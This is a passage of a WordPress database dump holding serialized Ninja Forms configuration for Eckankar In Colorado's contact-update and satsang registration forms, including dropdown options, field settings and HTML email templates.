Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_218\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:502;}i:8;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:7:\"Country\";s:9:\"field_key\";s:15:\"listcountry_219\";s:15:\"container_class\";s:8:\"one-half\";s:5:\"value\";s:2:\"US\";s:4:\"type\";s:11:\"listcountry\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"13\";s:5:\"label\";s:7:\"Country\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:2:\"US\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:24:\"country_use_custom_first\";s:1:\"1\";s:20:\"country_custom_first\";s:8:\"Colorado\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"default\";s:2:\"US\";s:7:\"options\";a:0:{}s:3:\"key\";s:15:\"listcountry_219\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:503;}i:9;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_207\";s:15:\"container_class\";s:0:\"\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_207\";}s:2:\"id\";i:504;}i:10;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:52:\"If You Have Comments To Add - Please Enter Them Here\";s:9:\"field_key\";s:12:\"textarea_210\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:52:\"If You Have Comments To Add - Please Enter Them Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_210\";}s:2:\"id\";i:505;}i:11;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797542883\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"612\";}i:12;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_212\";s:15:\"container_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_212\";}s:2:\"id\";i:507;}i:13;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:14;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797539003\";}s:2:\"id\";s:3:\"613\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-02-17 08:38:19\";s:5:\"label\";s:9:\"Save Form\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:15:\"submitter_email\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:12:\"from_address\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:211;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-02-17 08:38:19\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_204}\";s:13:\"email_subject\";s:27:\"Add/Update Email or Address\";s:13:\"email_message\";s:2779:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b>Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:212;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-02-17 08:38:19\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:1084:\"<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:213;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-02-17 08:38:19\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:27:\"Add/Update Email or Address\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:32:\"co.eck.dba@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:13:\"email_message\";s:3067:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Public</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";}s:2:\"id\";i:214;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:39:\"Add or Update Email or Address - Public\";s:10:\"created_at\";s:19:\"2022-02-17 08:38:19\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:15:\"formContentData\";a:14:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797542883\";i:12;s:10:\"submit_212\";i:13;s:18:\"html_1663797539003\";}s:12:\"calculations\";a:0:{}s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:12:\"date_updated\";s:19:\"2016-02-19 00:14:49\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"5\";s:10:\"conditions\";a:0:{}s:20:\"repeatable_fieldsets\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(54,'a:7:{s:2:\"id\";i:54;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:7:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:40:\"Statewide Satsang Intensive Registration\";s:3:\"key\";s:54:\"statewide_satsang_intensive_registration_1646235944769\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:303:\"<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Satsang Intensive Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:40:\"ECK Light and Sound Service Registration\";s:9:\"field_key\";s:54:\"eck_light_and_sound_service_registration_1620150522553\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:508;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:510;}i:2;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 